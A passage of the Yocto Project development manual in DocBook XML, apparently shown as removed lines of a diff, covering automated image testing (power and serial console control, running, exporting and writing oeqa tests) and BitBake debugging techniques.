- Here is an example that could appear in your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- TEST_POWERCONTROL_CMD = "powercontrol.exp test 10.11.12.1 nuc1"
- </literallayout>
- In this example, the expect script does the
- following:
- <literallayout class='monospaced'>
- ssh test@10.11.12.1 "pyctl nuc1 <replaceable>arg</replaceable>"
- </literallayout>
- It then runs a Python script that controls power
- for a label called <filename>nuc1</filename>.
- <note>
- You need to customize
- <filename>TEST_POWERCONTROL_CMD</filename>
- and
- <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
- for your own setup.
- The one requirement is that it accepts
- "on", "off", and "cycle" as the last argument.
- </note>
- </para></listitem>
- <listitem><para>
- When no command is defined, it connects to the
- device over SSH and uses the classic reboot command
- to reboot the device.
- Classic reboot is fine as long as the machine
- actually reboots (i.e. the SSH test has not
- failed).
- It is useful for scenarios where you have a simple
- setup, typically with a single board, and where
- some manual interaction is okay from time to time.
- </para></listitem>
- </itemizedlist>
- If you have no hardware to automatically perform power
- control but still wish to experiment with automated
- hardware testing, you can use the dialog-power-control
- script that shows a dialog prompting you to perform the
- required power action.
- This script requires either KDialog or Zenity to be
- installed.
- To use this script, set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_POWERCONTROL_CMD'><filename>TEST_POWERCONTROL_CMD</filename></ulink>
- variable as follows:
- <literallayout class='monospaced'>
- TEST_POWERCONTROL_CMD = "${COREBASE}/scripts/contrib/dialog-power-control"
- </literallayout>
- </para>
- </section>
-
- <section id='serial-console-connection'>
- <title>Serial Console Connection</title>
-
- <para>
- For test target classes requiring a serial console
- to interact with the bootloader (e.g. BeagleBoneTarget,
- EdgeRouterTarget, and GrubTarget), you need to
- specify a command to use to connect to the serial console
- of the target machine by using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SERIALCONTROL_CMD'><filename>TEST_SERIALCONTROL_CMD</filename></ulink>
- variable and optionally the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SERIALCONTROL_EXTRA_ARGS'><filename>TEST_SERIALCONTROL_EXTRA_ARGS</filename></ulink>
- variable.
- </para>
-
- <para>
- These cases could be a serial terminal program if the
- machine is connected to a local serial port, or a
- <filename>telnet</filename> or
- <filename>ssh</filename> command connecting to a remote
- console server.
- Regardless of the case, the command simply needs to
- connect to the serial console and forward that connection
- to standard input and output as any normal terminal
- program does.
- For example, to use the picocom terminal program on
- serial device <filename>/dev/ttyUSB0</filename>
- at 115200bps, you would set the variable as follows:
- <literallayout class='monospaced'>
- TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
- </literallayout>
- For local devices where the serial port device disappears
- when the device reboots, an additional "serdevtry" wrapper
- script is provided.
- To use this wrapper, simply prefix the terminal command
- with
- <filename>${COREBASE}/scripts/contrib/serdevtry</filename>:
- <literallayout class='monospaced'>
- TEST_SERIALCONTROL_CMD = "${COREBASE}/scripts/contrib/serdevtry picocom -b
-115200 /dev/ttyUSB0"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id="qemu-image-running-tests">
- <title>Running Tests</title>
-
- <para>
- You can start the tests automatically or manually:
- <itemizedlist>
- <listitem><para><emphasis>Automatically running tests:</emphasis>
- To run the tests automatically after the
- OpenEmbedded build system successfully creates an image,
- first set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></ulink>
- variable to "1" in your <filename>local.conf</filename>
- file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- TESTIMAGE_AUTO = "1"
- </literallayout>
- Next, build your image.
- If the image successfully builds, the tests run:
- <literallayout class='monospaced'>
- bitbake core-image-sato
- </literallayout></para></listitem>
- <listitem><para><emphasis>Manually running tests:</emphasis>
- To manually run the tests, first globally inherit the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
- class by editing your <filename>local.conf</filename>
- file:
- <literallayout class='monospaced'>
- INHERIT += "testimage"
- </literallayout>
- Next, use BitBake to run the tests:
- <literallayout class='monospaced'>
- bitbake -c testimage <replaceable>image</replaceable>
- </literallayout></para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- All test files reside in
- <filename>meta/lib/oeqa/runtime</filename> in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- A test name maps directly to a Python module.
- Each test module may contain a number of individual tests.
- Tests are usually grouped together by the area
- tested (e.g tests for systemd reside in
- <filename>meta/lib/oeqa/runtime/systemd.py</filename>).
- </para>
-
- <para>
- You can add tests to any layer provided you place them in the
- proper area and you extend
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
- in the <filename>local.conf</filename> file as normal.
- Be sure that tests reside in
- <filename><replaceable>layer</replaceable>/lib/oeqa/runtime</filename>.
- <note>
- Be sure that module names do not collide with module names
- used in the default set of test modules in
- <filename>meta/lib/oeqa/runtime</filename>.
- </note>
- </para>
-
- <para>
- You can change the set of tests run by appending or overriding
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SUITES'><filename>TEST_SUITES</filename></ulink>
- variable in <filename>local.conf</filename>.
- Each name in <filename>TEST_SUITES</filename> represents a
- required test for the image.
- Test modules named within <filename>TEST_SUITES</filename>
- cannot be skipped even if a test is not suitable for an image
- (e.g. running the RPM tests on an image without
- <filename>rpm</filename>).
- Appending "auto" to <filename>TEST_SUITES</filename> causes the
- build system to try to run all tests that are suitable for the
- image (i.e. each test module may elect to skip itself).
- </para>
-
- <para>
- The order you list tests in <filename>TEST_SUITES</filename>
- is important and influences test dependencies.
- Consequently, tests that depend on other tests should be added
- after the test on which they depend.
- For example, since the <filename>ssh</filename> test
- depends on the
- <filename>ping</filename> test, "ssh" needs to come after
- "ping" in the list.
- The test class provides no re-ordering or dependency handling.
- <note>
- Each module can have multiple classes with multiple test
- methods.
- And, Python <filename>unittest</filename> rules apply.
- </note>
- </para>
-
- <para>
- Here are some things to keep in mind when running tests:
- <itemizedlist>
- <listitem><para>The default tests for the image are defined
- as:
- <literallayout class='monospaced'>
- DEFAULT_TEST_SUITES_pn-<replaceable>image</replaceable> = "ping ssh df connman syslog xorg scp vnc date rpm dnf dmesg"
- </literallayout></para></listitem>
- <listitem><para>Add your own test to the list of the
- by using the following:
- <literallayout class='monospaced'>
- TEST_SUITES_append = " mytest"
- </literallayout></para></listitem>
- <listitem><para>Run a specific list of tests as follows:
- <literallayout class='monospaced'>
- TEST_SUITES = "test1 test2 test3"
- </literallayout>
- Remember, order is important.
- Be sure to place a test that is dependent on another test
- later in the order.</para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="exporting-tests">
- <title>Exporting Tests</title>
-
- <para>
- You can export tests so that they can run independently of
- the build system.
- Exporting tests is required if you want to be able to hand
- the test execution off to a scheduler.
- You can only export tests that are defined in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SUITES'><filename>TEST_SUITES</filename></ulink>.
- </para>
-
- <para>
- If your image is already built, make sure the following are set
- in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- INHERIT +="testexport"
- TEST_TARGET_IP = "<replaceable>IP-address-for-the-test-target</replaceable>"
- TEST_SERVER_IP = "<replaceable>IP-address-for-the-test-server</replaceable>"
- </literallayout>
- You can then export the tests with the following BitBake
- command form:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable> -c testexport
- </literallayout>
- Exporting the tests places them in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- in
- <filename>tmp/testexport/</filename><replaceable>image</replaceable>,
- which is controlled by the
- <filename>TEST_EXPORT_DIR</filename> variable.
- </para>
-
- <para>
- You can now run the tests outside of the build environment:
- <literallayout class='monospaced'>
- $ cd tmp/testexport/<replaceable>image</replaceable>
- $ ./runexported.py testdata.json
- </literallayout>
- </para>
-
- <para>
- Here is a complete example that shows IP addresses and uses
- the <filename>core-image-sato</filename> image:
- <literallayout class='monospaced'>
- INHERIT +="testexport"
- TEST_TARGET_IP = "192.168.7.2"
- TEST_SERVER_IP = "192.168.7.1"
- </literallayout>
- Use BitBake to export the tests:
- <literallayout class='monospaced'>
- $ bitbake core-image-sato -c testexport
- </literallayout>
- Run the tests outside of the build environment using the
- following:
- <literallayout class='monospaced'>
- $ cd tmp/testexport/core-image-sato
- $ ./runexported.py testdata.json
- </literallayout>
- </para>
- </section>
-
- <section id="qemu-image-writing-new-tests">
- <title>Writing New Tests</title>
-
- <para>
- As mentioned previously, all new test files need to be in the
- proper place for the build system to find them.
- New tests for additional functionality outside of the core
- should be added to the layer that adds the functionality, in
- <filename><replaceable>layer</replaceable>/lib/oeqa/runtime</filename>
- (as long as
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
- is extended in the layer's
- <filename>layer.conf</filename> file as normal).
- Just remember the following:
- <itemizedlist>
- <listitem><para>Filenames need to map directly to test
- (module) names.
- </para></listitem>
- <listitem><para>Do not use module names that
- collide with existing core tests.
- </para></listitem>
- <listitem><para>Minimally, an empty
- <filename>__init__.py</filename> file must exist
- in the runtime directory.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- To create a new test, start by copying an existing module
- (e.g. <filename>syslog.py</filename> or
- <filename>gcc.py</filename> are good ones to use).
- Test modules can use code from
- <filename>meta/lib/oeqa/utils</filename>, which are helper
- classes.
- </para>
-
- <note>
- Structure shell commands such that you rely on them and they
- return a single code for success.
- Be aware that sometimes you will need to parse the output.
- See the <filename>df.py</filename> and
- <filename>date.py</filename> modules for examples.
- </note>
-
- <para>
- You will notice that all test classes inherit
- <filename>oeRuntimeTest</filename>, which is found in
- <filename>meta/lib/oetest.py</filename>.
- This base class offers some helper attributes, which are
- described in the following sections:
- </para>
-
- <section id='qemu-image-writing-tests-class-methods'>
- <title>Class Methods</title>
-
- <para>
- Class methods are as follows:
- <itemizedlist>
- <listitem><para><emphasis><filename>hasPackage(pkg)</filename>:</emphasis>
- Returns "True" if <filename>pkg</filename> is in the
- installed package list of the image, which is based
- on the manifest file that is generated during the
- <filename>do_rootfs</filename> task.
- </para></listitem>
- <listitem><para><emphasis><filename>hasFeature(feature)</filename>:</emphasis>
- Returns "True" if the feature is in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
- or
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='qemu-image-writing-tests-class-attributes'>
- <title>Class Attributes</title>
-
- <para>
- Class attributes are as follows:
- <itemizedlist>
- <listitem><para><emphasis><filename>pscmd</filename>:</emphasis>
- Equals "ps -ef" if <filename>procps</filename> is
- installed in the image.
- Otherwise, <filename>pscmd</filename> equals
- "ps" (busybox).
- </para></listitem>
- <listitem><para><emphasis><filename>tc</filename>:</emphasis>
- The called test context, which gives access to the
- following attributes:
- <itemizedlist>
- <listitem><para><emphasis><filename>d</filename>:</emphasis>
- The BitBake datastore, which allows you to
- use stuff such as
- <filename>oeRuntimeTest.tc.d.getVar("VIRTUAL-RUNTIME_init_manager")</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>testslist</filename> and <filename>testsrequired</filename>:</emphasis>
- Used internally.
- The tests do not need these.
- </para></listitem>
- <listitem><para><emphasis><filename>filesdir</filename>:</emphasis>
- The absolute path to
- <filename>meta/lib/oeqa/runtime/files</filename>,
- which contains helper files for tests meant
- for copying on the target such as small
- files written in C for compilation.
- </para></listitem>
- <listitem><para><emphasis><filename>target</filename>:</emphasis>
- The target controller object used to deploy
- and start an image on a particular target
- (e.g. Qemu, SimpleRemote, and
- SystemdbootTarget).
- Tests usually use the following:
- <itemizedlist>
- <listitem><para><emphasis><filename>ip</filename>:</emphasis>
- The target's IP address.
- </para></listitem>
- <listitem><para><emphasis><filename>server_ip</filename>:</emphasis>
- The host's IP address, which is
- usually used by the DNF test
- suite.
- </para></listitem>
- <listitem><para><emphasis><filename>run(cmd, timeout=None)</filename>:</emphasis>
- The single, most used method.
- This command is a wrapper for:
- <filename>ssh root@host "cmd"</filename>.
- The command returns a tuple:
- (status, output), which are what
- their names imply - the return code
- of "cmd" and whatever output
- it produces.
- The optional timeout argument
- represents the number of seconds the
- test should wait for "cmd" to
- return.
- If the argument is "None", the
- test uses the default instance's
- timeout period, which is 300
- seconds.
- If the argument is "0", the test
- runs until the command returns.
- </para></listitem>
- <listitem><para><emphasis><filename>copy_to(localpath, remotepath)</filename>:</emphasis>
- <filename>scp localpath root@ip:remotepath</filename>.
- </para></listitem>
- <listitem><para><emphasis><filename>copy_from(remotepath, localpath)</filename>:</emphasis>
- <filename>scp root@host:remotepath localpath</filename>.
- </para></listitem>
- </itemizedlist></para></listitem>
- </itemizedlist></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='qemu-image-writing-tests-instance-attributes'>
- <title>Instance Attributes</title>
-
- <para>
- A single instance attribute exists, which is
- <filename>target</filename>.
- The <filename>target</filename> instance attribute is
- identical to the class attribute of the same name, which
- is described in the previous section.
- This attribute exists as both an instance and class
- attribute so tests can use
- <filename>self.target.run(cmd)</filename> in instance
- methods instead of
- <filename>oeRuntimeTest.tc.target.run(cmd)</filename>.
- </para>
- </section>
- </section>
-
- <section id='installing-packages-in-the-dut-without-the-package-manager'>
- <title>Installing Packages in the DUT Without the Package Manager</title>
-
- <para>
- When a test requires a package built by BitBake, it is possible
- to install that package.
- Installing the package does not require a package manager be
- installed in the device under test (DUT).
- It does, however, require an SSH connection and the target must
- be using the <filename>sshcontrol</filename> class.
- <note>
- This method uses <filename>scp</filename> to copy files
- from the host to the target, which causes permissions and
- special attributes to be lost.
- </note>
- </para>
-
- <para>
- A JSON file is used to define the packages needed by a test.
- This file must be in the same path as the file used to define
- the tests.
- Furthermore, the filename must map directly to the test
- module name with a <filename>.json</filename> extension.
- </para>
-
- <para>
- The JSON file must include an object with the test name as
- keys of an object or an array.
- This object (or array of objects) uses the following data:
- <itemizedlist>
- <listitem><para>"pkg" - A mandatory string that is the
- name of the package to be installed.
- </para></listitem>
- <listitem><para>"rm" - An optional boolean, which defaults
- to "false", that specifies to remove the package after
- the test.
- </para></listitem>
- <listitem><para>"extract" - An optional boolean, which
- defaults to "false", that specifies if the package must
- be extracted from the package format.
- When set to "true", the package is not automatically
- installed into the DUT.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Following is an example JSON file that handles test "foo"
- installing package "bar" and test "foobar" installing
- packages "foo" and "bar".
- Once the test is complete, the packages are removed from the
- DUT.
- <literallayout class='monospaced'>
- {
- "foo": {
- "pkg": "bar"
- },
- "foobar": [
- {
- "pkg": "foo",
- "rm": true
- },
- {
- "pkg": "bar",
- "rm": true
- }
- ]
- }
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='usingpoky-debugging-tools-and-techniques'>
- <title>Debugging Tools and Techniques</title>
-
- <para>
- The exact method for debugging build failures depends on the nature
- of the problem and on the system's area from which the bug
- originates.
- Standard debugging practices such as comparison against the last
- known working version with examination of the changes and the
- re-application of steps to identify the one causing the problem are
- valid for the Yocto Project just as they are for any other system.
- Even though it is impossible to detail every possible potential
- failure, this section provides some general tips to aid in
- debugging given a variety of situations.
- <note><title>Tip</title>
- A useful feature for debugging is the error reporting tool.
- Configuring the Yocto Project to use this tool causes the
- OpenEmbedded build system to produce error reporting commands as
- part of the console output.
- You can enter the commands after the build completes to log
- error information into a common database, that can help you
- figure out what might be going wrong.
- For information on how to enable and use this feature, see the
- "<link linkend='using-the-error-reporting-tool'>Using the Error Reporting Tool</link>"
- section.
- </note>
- </para>
-
- <para>
- The following list shows the debugging topics in the remainder of
- this section:
- <itemizedlist>
- <listitem><para>
- "<link linkend='dev-debugging-viewing-logs-from-failed-tasks'>Viewing Logs from Failed Tasks</link>"
- describes how to find and view logs from tasks that
- failed during the build process.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-debugging-viewing-variable-values'>Viewing Variable Values</link>"
- describes how to use the BitBake <filename>-e</filename>
- option to examine variable values after a recipe has been
- parsed.
- </para></listitem>
- <listitem><para>
- "<link linkend='viewing-package-information-with-oe-pkgdata-util'>Viewing Package Information with <filename>oe-pkgdata-util</filename></link>"
- describes how to use the
- <filename>oe-pkgdata-util</filename> utility to query
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
- and display package-related information for built
- packages.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-viewing-dependencies-between-recipes-and-tasks'>Viewing Dependencies Between Recipes and Tasks</link>"
- describes how to use the BitBake <filename>-g</filename>
- option to display recipe dependency information used
- during the build.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</link>"
- describes how to use the
- <filename>bitbake-dumpsig</filename> command in
- conjunction with key subdirectories in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- to determine variable dependencies.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-debugging-taskrunning'>Running Specific Tasks</link>"
- describes how to use several BitBake options (e.g.
- <filename>-c</filename>, <filename>-C</filename>, and
- <filename>-f</filename>) to run specific tasks in the
- build chain.
- It can be useful to run tasks "out-of-order" when trying
- isolate build issues.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-debugging-bitbake'>General BitBake Problems</link>"
- describes how to use BitBake's <filename>-D</filename>
- debug output option to reveal more about what BitBake is
- doing during the build.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-debugging-buildfile'>Building with No Dependencies</link>"
- describes how to use the BitBake <filename>-b</filename>
- option to build a recipe while ignoring dependencies.
- </para></listitem>
- <listitem><para>
- "<link linkend='recipe-logging-mechanisms'>Recipe Logging Mechanisms</link>"
- describes how to use the many recipe logging functions
- to produce debugging output and report errors and warnings.
- </para></listitem>
- <listitem><para>
- "<link linkend='debugging-parallel-make-races'>Debugging Parallel Make Races</link>"
- describes how to debug situations where the build consists
- of several parts that are run simultaneously and when the
- output or result of one part is not ready for use with a
- different part of the build that depends on that output.
- </para></listitem>
- <listitem><para>
- "<link linkend='platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</link>"
- describes how to use GDB to allow you to examine running
- programs, which can help you fix problems.
- </para></listitem>
- <listitem><para>
- "<link linkend='debugging-with-the-gnu-project-debugger-gdb-on-the-target'>Debugging with the GNU Project Debugger (GDB) on the Target</link>"
- describes how to use GDB directly on target hardware for
- debugging.
- </para></listitem>
- <listitem><para>
- "<link linkend='dev-other-debugging-others'>Other Debugging Tips</link>"
- describes miscellaneous debugging tips that can be useful.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='dev-debugging-viewing-logs-from-failed-tasks'>
- <title>Viewing Logs from Failed Tasks</title>
-
- <para>
- You can find the log for a task in the file
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/temp/log.do_</filename><replaceable>taskname</replaceable>.
- For example, the log for the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
- task of the QEMU minimal image for the x86 machine
- (<filename>qemux86</filename>) might be in
- <filename>tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/temp/log.do_compile</filename>.
- To see the commands
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- ran to generate a log, look at the corresponding
- <filename>run.do_</filename><replaceable>taskname</replaceable>
- file in the same directory.
- </para>
-
- <para>
- <filename>log.do_</filename><replaceable>taskname</replaceable>
- and
- <filename>run.do_</filename><replaceable>taskname</replaceable>
- are actually symbolic links to
- <filename>log.do_</filename><replaceable>taskname</replaceable><filename>.</filename><replaceable>pid</replaceable>
- and
- <filename>log.run_</filename><replaceable>taskname</replaceable><filename>.</filename><replaceable>pid</replaceable>,
- where <replaceable>pid</replaceable> is the PID the task had
- when it ran.
- The symlinks always point to the files corresponding to the most
- recent run.
- </para>
- </section>
-
- <section id='dev-debugging-viewing-variable-values'>
- <title>Viewing Variable Values</title>
-
- <para>
- Sometimes you need to know the value of a variable as a
- result of BitBake's parsing step.
- This could be because some unexpected behavior occurred
- in your project.
- Perhaps an attempt to
- <ulink url='&YOCTO_DOCS_BB_URL;#modifying-existing-variables'>modify a variable</ulink>
- did not work out as expected.
- </para>
-
- <para>
- BitBake's <filename>-e</filename> option is used to display
- variable values after parsing.
- The following command displays the variable values after the
- configuration files (i.e. <filename>local.conf</filename>,
- <filename>bblayers.conf</filename>,
- <filename>bitbake.conf</filename> and so forth) have been
- parsed:
- <literallayout class='monospaced'>
- $ bitbake -e
- </literallayout>
- The following command displays variable values after a specific
- recipe has been parsed.
- The variables include those from the configuration as well:
- <literallayout class='monospaced'>
- $ bitbake -e recipename
- </literallayout>
- <note><para>
- Each recipe has its own private set of variables
- (datastore).
- Internally, after parsing the configuration, a copy of the
- resulting datastore is made prior to parsing each recipe.
- This copying implies that variables set in one recipe will
- not be visible to other recipes.</para>
-
- <para>Likewise, each task within a recipe gets a private
- datastore based on the recipe datastore, which means that
- variables set within one task will not be visible to
- other tasks.</para>
- </note>
- </para>
-
- <para>
- In the output of <filename>bitbake -e</filename>, each
- variable is preceded by a description of how the variable
- got its value, including temporary values that were later
- overriden.
- This description also includes variable flags (varflags) set on
- the variable.
- The output can be very helpful during debugging.
- </para>
-
- <para>
- Variables that are exported to the environment are preceded by
- <filename>export</filename> in the output of
- <filename>bitbake -e</filename>.
- See the following example:
- <literallayout class='monospaced'>
- export CC="i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/ulf/poky/build/tmp/sysroots/qemux86"
- </literallayout>
- </para>
-
- <para>
- In addition to variable values, the output of the
- <filename>bitbake -e</filename> and
- <filename>bitbake -e</filename>&nbsp;<replaceable>recipe</replaceable>
- commands includes the following information:
- <itemizedlist>
- <listitem><para>
- The output starts with a tree listing all configuration
- files and classes included globally, recursively listing
- the files they include or inherit in turn.
- Much of the behavior of the OpenEmbedded build system
- (including the behavior of the
- <ulink url='&YOCTO_DOCS_REF_URL;#normal-recipe-build-tasks'>normal recipe build tasks</ulink>)
- is implemented in the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-base'><filename>base</filename></ulink>
- class and the classes it inherits, rather than being
- built into BitBake itself.
- </para></listitem>
- <listitem><para>
- After the variable values, all functions appear in the
- output.
- For shell functions, variables referenced within the
- function body are expanded.
- If a function has been modified using overrides or
- using override-style operators like
- <filename>_append</filename> and
- <filename>_prepend</filename>, then the final assembled
- function body appears in the output.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='viewing-package-information-with-oe-pkgdata-util'>
- <title>Viewing Package Information with <filename>oe-pkgdata-util</filename></title>
-
- <para>
- You can use the <filename>oe-pkgdata-util</filename>
- command-line utility to query
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
- and display various package-related information.
- When you use the utility, you must use it to view information
- on packages that have already been built.
- </para>
-
- <para>
- Following are a few of the available
- <filename>oe-pkgdata-util</filename> subcommands.
- <note>
- You can use the standard * and ? globbing wildcards as part
- of package names and paths.
- </note>
- <itemizedlist>
- <listitem><para>
- <filename>oe-pkgdata-util list-pkgs [</filename><replaceable>pattern</replaceable><filename>]</filename>:
- Lists all packages that have been built, optionally
- limiting the match to packages that match
- <replaceable>pattern</replaceable>.
- </para></listitem>
- <listitem><para>
- <filename>oe-pkgdata-util list-pkg-files&nbsp;</filename><replaceable>package</replaceable><filename>&nbsp;...</filename>:
- Lists the files and directories contained in the given
- packages.
- <note>
- <para>
- A different way to view the contents of a package is
- to look at the
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/packages-split</filename>
- directory of the recipe that generates the
- package.
- This directory is created by the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
- task and has one subdirectory for each package the
- recipe generates, which contains the files stored in
- that package.</para>
- <para>
- If you want to inspect the
- <filename>${WORKDIR}/packages-split</filename>
- directory, make sure that
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
- is not enabled when you build the recipe.
- </para>
- </note>
- </para></listitem>
- <listitem><para>
- <filename>oe-pkgdata-util find-path&nbsp;</filename><replaceable>path</replaceable><filename>&nbsp;...</filename>:
- Lists the names of the packages that contain the given
- paths.
- For example, the following tells us that
- <filename>/usr/share/man/man1/make.1</filename>
- is contained in the <filename>make-doc</filename>
- package:
- <literallayout class='monospaced'>
- $ oe-pkgdata-util find-path /usr/share/man/man1/make.1
- make-doc: /usr/share/man/man1/make.1
- </literallayout>
- </para></listitem>
- <listitem><para>
- <filename>oe-pkgdata-util lookup-recipe&nbsp;</filename><replaceable>package</replaceable><filename>&nbsp;...</filename>:
- Lists the name of the recipes that
- produce the given packages.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- For more information on the <filename>oe-pkgdata-util</filename>
- command, use the help facility:
- <literallayout class='monospaced'>
- $ oe-pkgdata-util &dash;&dash;help
- $ oe-pkgdata-util <replaceable>subcommand</replaceable> --help
- </literallayout>
- </para>
- </section>
-
- <section id='dev-viewing-dependencies-between-recipes-and-tasks'>
- <title>Viewing Dependencies Between Recipes and Tasks</title>
-
- <para>
- Sometimes it can be hard to see why BitBake wants to build other
- recipes before the one you have specified.
- Dependency information can help you understand why a recipe is
- built.
- </para>
-
- <para>
- To generate dependency information for a recipe, run the
- following command:
- <literallayout class='monospaced'>
- $ bitbake -g <replaceable>recipename</replaceable>
- </literallayout>
- This command writes the following files in the current
- directory:
- <itemizedlist>
- <listitem><para>
- <filename>pn-buildlist</filename>: A list of
- recipes/targets involved in building
- <replaceable>recipename</replaceable>.
- "Involved" here means that at least one task from the
- recipe needs to run when building
- <replaceable>recipename</replaceable> from scratch.
- Targets that are in
- <ulink url='&YOCTO_DOCS_REF_URL;#var-ASSUME_PROVIDED'><filename>ASSUME_PROVIDED</filename></ulink>
- are not listed.
- </para></listitem>
- <listitem><para>
- <filename>task-depends.dot</filename>: A graph showing
- dependencies between tasks.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The graphs are in
- <ulink url='https://en.wikipedia.org/wiki/DOT_%28graph_description_language%29'>DOT</ulink>
- format and can be converted to images (e.g. using the
- <filename>dot</filename> tool from
- <ulink url='http://www.graphviz.org/'>Graphviz</ulink>).
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- DOT files use a plain text format.
- The graphs generated using the
- <filename>bitbake -g</filename> command are often so
- large as to be difficult to read without special
- pruning (e.g. with Bitbake's
- <filename>-I</filename> option) and processing.
- Despite the form and size of the graphs, the
- corresponding <filename>.dot</filename> files can
- still be possible to read and provide useful
- information.
- </para>
-
- <para>As an example, the
- <filename>task-depends.dot</filename> file contains
- lines such as the following:
- <literallayout class='monospaced'>
- "libxslt.do_configure" -> "libxml2.do_populate_sysroot"
- </literallayout>
- The above example line reveals that the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
- task in <filename>libxslt</filename> depends on the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
- task in <filename>libxml2</filename>, which is a
- normal
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
- dependency between the two recipes.
- </para></listitem>
- <listitem><para>
- For an example of how <filename>.dot</filename>
- files can be processed, see the
- <filename>scripts/contrib/graph-tool</filename>
- Python script, which finds and displays paths
- between graph nodes.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- You can use a different method to view dependency information
- by using the following command:
- <literallayout class='monospaced'>
- $ bitbake -g -u taskexp <replaceable>recipename</replaceable>
- </literallayout>
- This command displays a GUI window from which you can view
- build-time and runtime dependencies for the recipes involved in
- building <replaceable>recipename</replaceable>.
- </para>
- </section>
-
- <section id='dev-viewing-task-variable-dependencies'>
- <title>Viewing Task Variable Dependencies</title>
-
- <para>
- As mentioned in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#checksums'>Checksums (Signatures)</ulink>"
- section of the BitBake User Manual, BitBake tries to
- automatically determine what variables a task depends on so
- that it can rerun the task if any values of the variables
- change.
- This determination is usually reliable.
- However, if you do things like construct variable names at
- runtime, then you might have to manually declare dependencies
- on those variables using <filename>vardeps</filename> as
- described in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'>Variable Flags</ulink>"
- section of the BitBake User Manual.
- </para>
-
- <para>
- If you are unsure whether a variable dependency is being
- picked up automatically for a given task, you can list the
- variable dependencies BitBake has determined by doing the
- following:
- <orderedlist>
- <listitem><para>
- Build the recipe containing the task:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>recipename</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- Inside the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMPS_DIR'><filename>STAMPS_DIR</filename></ulink>
- directory, find the signature data
- (<filename>sigdata</filename>) file that corresponds
- to the task.
- The <filename>sigdata</filename> files contain a pickled
- Python database of all the metadata that went into
- creating the input checksum for the task.
- As an example, for the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
